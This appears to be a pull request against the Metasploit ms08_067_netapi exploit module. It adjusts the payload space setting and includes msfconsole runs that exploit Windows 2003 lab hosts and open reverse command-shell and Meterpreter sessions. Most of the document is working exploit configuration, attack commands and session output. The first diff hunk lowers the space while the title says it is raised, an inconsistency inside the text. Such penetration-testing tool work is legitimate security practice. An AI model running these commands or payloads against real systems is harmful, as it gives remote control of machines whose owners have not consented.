### PR TITLE
increase the amount of space needed for ms08_067

### DIFF
--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => true,
       'Payload'        =>
         {
-          'Space'    => 450,
+          'Space'    => 410,
           'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40",
           'Prepend'  => "\x81\xE4\xF0\xFF\xFF\xFF", # stack alignment
           'StackAdjustment' => -3500,

--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => true,
       'Payload'        =>
         {
-          'Space'    => 400,
+          'Space'    => 450,
           'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40",
           'Prepend'  => "\x81\xE4\xF0\xFF\xFF\xFF", # stack alignment
           'StackAdjustment' => -3500,


### PR DESCRIPTION
Fix #6269 

It seems that we need more space than we indicate in the exploit; using the new network-reliable TCP stagers with this exploit causes the server service to crash. This does not really change what the stager generates, since we're currently estimating their size is around 350 bytes. I need someone much wiser than I to say why we capped at 400 bytes, since I don't know all of the history surrounding this implementation.

```
./msfconsole -qx 'use exploit/windows/smb/ms08_067_netapi; set payload windows/shell/reverse_tcp; set lhost 192.168.56.1; set rhost 192.168.56.105; run'
payload => windows/shell/reverse_tcp
lhost => 192.168.56.1
rhost => 192.168.56.105
354, 450
[*] Started reverse handler on 192.168.56.1:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.56.105
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.105:1031) at 2015-11-25 07:09:41 -0600

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>
```

```
./msfconsole -qx 'use exploit/windows/smb/ms08_067_netapi; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.56.1; set rhost 192.168.56.105; run'
payload => windows/meterpreter/reverse_tcp
lhost => 192.168.56.1
rhost => 192.168.56.105
[*] Started reverse handler on 192.168.56.1:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (885806 bytes) to 192.168.56.105
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.105:1033) at 2015-11-25 07:11:12 -0600

meterpreter >
```
# Validation steps
- [x] Verify that reverse_tcp stagers work with ms08_067 on Windows XP (shell and meterpreter)
- [x] Verify that reverse_tcp stagers work with ms08_067 on Windows 2003 (shell and meterpreter)
